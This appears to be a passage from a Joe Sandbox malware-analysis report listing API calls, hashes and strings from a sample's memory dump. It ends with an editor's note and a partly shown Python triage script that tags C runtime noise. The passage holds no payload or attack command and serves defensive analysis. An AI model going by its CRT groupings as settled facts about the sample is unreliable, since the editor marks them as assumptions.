    • Instruction Fuzzy Hash: FC21A132A42383AAD7B48B16C910ADF72AFAB54F54B368424E90ADB314E732DD41C750
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DC3
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DF9
    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 006E2EE3
    • IsValidCodePage.KERNEL32(00000000), ref: 006E2F2C
    • IsValidLocale.KERNEL32(?,00000001), ref: 006E2F3B
    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006E2F83
    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006E2FA2
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
    • String ID:
    • API String ID: 949163717-0
    • Opcode ID: 1882787b5c3bebf76b522643f46458d860dceedec49ac92e5c7f1ecbd12131d0
    • Instruction ID: 4adb82fce2d55142f6446a1907d66d0bd91b71969f2af76c1fa77ea9dceef99d
    • Opcode Fuzzy Hash: 1882787b5c3bebf76b522643f46458d860dceedec49ac92e5c7f1ecbd12131d0
    • Instruction Fuzzy Hash: 3C514E71A0139AAFEB10DFA6DC55AFA77BFBF04700F144469E914EB290EB709940CB61
    APIs
    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000,00000000), ref: 006BA3C6
    • CryptGetHashParam.ADVAPI32(?,00000002,00000010,00000010,00000000), ref: 006BA3EE
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • CryptDestroyHash.ADVAPI32(?), ref: 006BA40D
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 006BA42C
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006BA443
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$Hash$Param$CheckContextDestroyFailureReleaseStackVars@8
    • String ID:
    • API String ID: 2592047032-0
    • Opcode ID: 8e3c4e57001aab9c79bb000c4ac6a44573a8cd98bd59e6b993e9230589330a79
    • Instruction ID: c876fa7c05b064e102be3ec9a7cc5ef0c36f7a18d5f655cc30d9d19d09056543
    • Opcode Fuzzy Hash: 8e3c4e57001aab9c79bb000c4ac6a44573a8cd98bd59e6b993e9230589330a79
    • Instruction Fuzzy Hash: F6217FB1900214AFDB10EF98D886BDDBB6AEB05310F51C259E8089B291C7719E85CBD1
    APIs
    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040), ref: 00682F84
    • CryptGenRandom.ADVAPI32(00000000,?,CCCCCCCC), ref: 00682FAA
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00682FC3
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00682FF8
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$Context$AcquireCheckRandomReleaseStackVars@8
    • String ID:
    • API String ID: 2095186926-0
    • Opcode ID: a0f0aa4fb5534902577b8208dbd39e062f45f0e297eba33ea81193b07684191d
    • Instruction ID: 7dd359028afa1493e0cab6946831179981d46d23151d3f0bff3ea95afafb1365
    • Opcode Fuzzy Hash: a0f0aa4fb5534902577b8208dbd39e062f45f0e297eba33ea81193b07684191d
    • Instruction Fuzzy Hash: 3F11C472E00214BFDB10FB5DDC86BDE773AEB05310F114258FA08AB291DA748E8487D5
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068C26E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: bind() failed; %s
    • API String ID: 930174750-1141498939
    • Opcode ID: 6f7a1c6e6d82e6e10563210c2c8306faea41cd73a645c37bb6cc4abd9d1a27f5
    • Instruction ID: 830e78e8183b8c5a6513ee98531fa534a2a9f3385173a9db35c5b9eddea5ed6b
    • Opcode Fuzzy Hash: 6f7a1c6e6d82e6e10563210c2c8306faea41cd73a645c37bb6cc4abd9d1a27f5
    • Instruction Fuzzy Hash: 58816274A00208EFDB14DF58D895BEDB7B6FF45314F1082A8E8496B382D7359A85CB91
    APIs
    • recv.WS2_32(?,?,?,00000000), ref: 00662308
    • WSAGetLastError.WS2_32 ref: 00662320
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorFailureLastrecv
    • String ID: 3'
    • API String ID: 2694527515-280543908
    • Opcode ID: 8e7c05164999bf74f4e69cb754f36e84a857cffa1d90ce7ccdead063b1cf43f8
    • Instruction ID: baca39741812d3d577781ee6f2149206064f19f5ae751489c1e8ab39ad0d17f2
    • Opcode Fuzzy Hash: 8e7c05164999bf74f4e69cb754f36e84a857cffa1d90ce7ccdead063b1cf43f8
    • Instruction Fuzzy Hash: FE115171D04619DFCB40EFA9D8957DD77B5BB04310F108599E828B7380D7794A80CBD1
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DC3
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DF9
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E28DD
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E2927
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E29ED
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: InfoLocale$ErrorLast_free
    • String ID:
    • API String ID: 3140898709-0
    • Opcode ID: 1e160080be597ccac2c68f67e04193e68b5173dfcc896d2f21ab36c26dc47fe8
    • Instruction ID: e31d08dcf3da7f9c0cae6dd7a14b7be6dd780f4cbff7125e61383d82cf445eba
    • Opcode Fuzzy Hash: 1e160080be597ccac2c68f67e04193e68b5173dfcc896d2f21ab36c26dc47fe8
    • Instruction Fuzzy Hash: 21617F7190134B9FDB289F2ACC92BAA77AFFF04700F144179E905CA285EB74D985CB54
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 006C5400
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 006C540A
    • UnhandledExceptionFilter.KERNEL32(006BD59C,?,?,?,?,?,?), ref: 006C5417
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: a241d80e5ae16fd09e76898ce13c3993527f02db70026bc1ad56e2f768e42ef6
    • Instruction ID: 8f23df7044af7dc40b4e22c34e591e12102186118d4abd81411bf32b482158c6
    • Opcode Fuzzy Hash: a241d80e5ae16fd09e76898ce13c3993527f02db70026bc1ad56e2f768e42ef6
    • Instruction Fuzzy Hash: 9A31C2749012189BCB61DF64DC89BD9BBB9EF08310F5081DAE50CAB261EB709B818F44
    APIs
    • GetCurrentProcess.KERNEL32(?,?,006D3AC4,006FA414,?,?,006FA414), ref: 006D3AE7
    • TerminateProcess.KERNEL32(00000000,?,006D3AC4,006FA414,?,?,006FA414), ref: 006D3AEE
    • ExitProcess.KERNEL32 ref: 006D3B00
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 847fefc98b457895527628af449301e6b59aacb2e169e197c1b226d92bbf6028
    • Instruction ID: a9b75b4f20173acb4f3610133d7f3c5786c1c4a83a8c11a82c2a916d504ad8e1
    • Opcode Fuzzy Hash: 847fefc98b457895527628af449301e6b59aacb2e169e197c1b226d92bbf6028
    • Instruction Fuzzy Hash: 99E08C31800688AFCF916F54CD8AA487F2BFB00341B08402AF9098B331CF35EE41CB81
    APIs
    • CryptAcquireContextA.ADVAPI32(006BA280,00000000,00000000,00000001,F0000000,?,?,006BA280,?,006B35B3,?,00000000,?), ref: 006BA318
    • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,006BA27C,?,?,006BA280,?,006B35B3,?,00000000,?), ref: 006BA341
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Crypt$AcquireContextCreateFailureHash
    • String ID:
    • API String ID: 4198798452-0
    • Opcode ID: dc613eca5e60455070f4aac9d00bd1f37b979ed9c4558fbf4af0aca7a8fc7d13
    • Instruction ID: a3537d5fea8d7fbffb90a4be88d71ae3c56565d4c0d7b586d1671cac3e6c0243
    • Opcode Fuzzy Hash: dc613eca5e60455070f4aac9d00bd1f37b979ed9c4558fbf4af0aca7a8fc7d13
    • Instruction Fuzzy Hash: 2CF03071240314BBE760AB14DC82FD93B6AAB46764F158014FE486F2D1CAB6ED8087D5
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DC3
      • Part of subcall function 006D8D61: _free.LIBCMT ref: 006D8DF9
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E2B30
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_free$InfoLocale
    • String ID:
    • API String ID: 2003897158-0
    • Opcode ID: 1e73c88c7224f8172027f276c253828f6e7efbe5b61c152b383dedd59fc389c3
    • Instruction ID: a8f12d3e95029943394fed55ac2a869a69a0eb9e69dacddf9539dbbe9ce35d1d
    • Opcode Fuzzy Hash: 1e73c88c7224f8172027f276c253828f6e7efbe5b61c152b383dedd59fc389c3
    • Instruction Fuzzy Hash: 7621A172A1234BABDF289E26CC92EBA73AFEF04314B10406EF905D6241EA759D018654
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • EnumSystemLocalesW.KERNEL32(006E2889,00000001,00000000,?,-00000050,?,006E2EB7,00000000,?,?,?,00000055,?), ref: 006E27D5
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: caccf67daf3e32c7e8088754bc839c1849c64c1d39a80c19f4ad612b443d27bf
    • Instruction ID: b4cdc3797f1893526e8a1ad5e746a874581197659877e4be3667cf39a735f3b6
    • Opcode Fuzzy Hash: caccf67daf3e32c7e8088754bc839c1849c64c1d39a80c19f4ad612b443d27bf
    • Instruction Fuzzy Hash: 2E11253A2003069FDF189F3AC8A19BABB97FF84718B15442DE94787B40D771B802CB40
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,006E2AA5,00000000,00000000,?), ref: 006E2D34
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$InfoLocale
    • String ID:
    • API String ID: 3736152602-0
    • Opcode ID: f2a9f02e7a31c5ecc3f3fb8275e36216a97dd99b3c3f86a3fe4831d5de945bca
    • Instruction ID: f19570a5962c4ac24ce87d6906e527d696877d0eeeecd784c096155e4dc29c2c
    • Opcode Fuzzy Hash: f2a9f02e7a31c5ecc3f3fb8275e36216a97dd99b3c3f86a3fe4831d5de945bca
    • Instruction Fuzzy Hash: CBF0D6325117566FDB2496228C56AFA775FEF40754F150429EE16A32C0DA74FD02C5D0
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • EnumSystemLocalesW.KERNEL32(006E2ADC,00000001,?,?,-00000050,?,006E2E7B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 006E2848
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: ee966fa92c046a4db025e4f7dfc9817b80297ea7c2afc220ebb903f2ab4e36f7
    • Instruction ID: b2d4127a4f1c77a4ba82f2f74cc69f8f5d8fb2184b7814cfd634136116e6cebc
    • Opcode Fuzzy Hash: ee966fa92c046a4db025e4f7dfc9817b80297ea7c2afc220ebb903f2ab4e36f7
    • Instruction Fuzzy Hash: 00F0463220034A1FDB245F3A9C91ABB7B9BEF81328F05803EF90A4B680C6719C42CB50
    APIs
      • Part of subcall function 006D30A1: EnterCriticalSection.KERNEL32(?,?,006D376B,00000000,006FA9D0,0000000C,006D3732,006BD8C4,?,006DB00A,006BD8C4,?,006D8F03,00000001,00000364,00000006), ref: 006D30B0
    • EnumSystemLocalesW.KERNEL32(006DB034,00000001,006FAC70,0000000C,006DB49F,00000000), ref: 006DB079
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CriticalEnterEnumLocalesSectionSystem
    • String ID:
    • API String ID: 1272433827-0
    • Opcode ID: 059e1cac58ab1cf60cf52bc7bd9145d6e6fda79632ad23737a3d8432c02b5363
    • Instruction ID: ad215ee4c2ed36b8f739630030b93f0ecc5800303c84c156f11ae5ac7976d5d6
    • Opcode Fuzzy Hash: 059e1cac58ab1cf60cf52bc7bd9145d6e6fda79632ad23737a3d8432c02b5363
    • Instruction Fuzzy Hash: C5F04972A00215DFDB10EF98E842B9D77B1EB45721F10815BF914DB3A1CBB98A408B89
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • EnumSystemLocalesW.KERNEL32(006E2671,00000001,?,?,?,006E2ED9,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006E274F
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: 5ed7d18a37c74bbe0f8471b7a1c425ea397d45e526344fd8b63c85750cc24415
    • Instruction ID: d0ff1cf8b3f51ed44663c8cb3db67e50d6d74a3ff5765073f39012e178da2543
    • Opcode Fuzzy Hash: 5ed7d18a37c74bbe0f8471b7a1c425ea397d45e526344fd8b63c85750cc24415
    • Instruction Fuzzy Hash: 57F0E53A30034A5BCF14AF36D8556AABF9BEFC2754B1A405AEE098B691C6719843C790
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006D5BB5,?,20001004,00000000,00000002,?,?,006D51A0), ref: 006DB5D7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: 14eccdd6c46728979b44a857b6fe30cf5c700dc2613eaf06e11ab451c1a0df94
    • Instruction ID: bb922aee35ae55ee07d1c2870aba9790ff390836b3670159638378164cd57c81
    • Opcode Fuzzy Hash: 14eccdd6c46728979b44a857b6fe30cf5c700dc2613eaf06e11ab451c1a0df94
    • Instruction Fuzzy Hash: 4EE01A31900268FFCF122F61EC05AAE3F27EF84B50F055016F9056A3658F728A21AAD4
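Most of the function entries in this stretch are MSVC C runtime internals rather than the sample's own logic: the GetLocaleInfoW / EnumSystemLocalesW / IsValidCodePage / GetACP / GetUserDefaultLCID groups are the CRT's locale and code-page initialisation, the IsDebuggerPresent + SetUnhandledExceptionFilter(NULL) + UnhandledExceptionFilter triple at 006C5400 has the shape of the CRT's security-failure handler, GetCurrentProcess / TerminateProcess / ExitProcess at 006D3AE7 is the CRT exit path, and every @_RTC_CheckStackVars@8 or _RTC_Failure reference marks a debug-CRT build with run-time checks compiled in. The script below is an added triage helper, not part of the Joe Sandbox report; it parses entries in the report's layout (a cut-down copy of five entries from above is embedded as constructed input), tags the CRT groups (the groupings are the editor's assumptions, listed in the code), and leaves the CryptoAPI, Winsock and string-bearing entries, such as the one carrying "bind() failed; %s", for manual review.

```python
"""Triage Joe Sandbox per-function entries: tag MSVC CRT runtime noise so the few
application-level functions (CryptoAPI, Winsock, string-bearing code) stand out.
Added example, not part of the report."""
import re
from typing import Dict, List

# Constructed sample: cut-down copies of five entries from the report above.
SAMPLE_REPORT = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 006C5400
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 006C540A
• UnhandledExceptionFilter.KERNEL32(006BD59C,?,?,?,?,?,?), ref: 006C5417
Memory Dump Source
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E28DD
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006E2927
Memory Dump Source
• API ID: InfoLocale$ErrorLast_free
• String ID:
APIs
• @_RTC_CheckStackVars@8.LIBCMT ref: 0068C26E
Strings
Memory Dump Source
• API ID: CheckStackVars@8
• String ID: bind() failed; %s
APIs
• recv.WS2_32(?,?,?,00000000), ref: 00662308
• WSAGetLastError.WS2_32 ref: 00662320
  • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
Memory Dump Source
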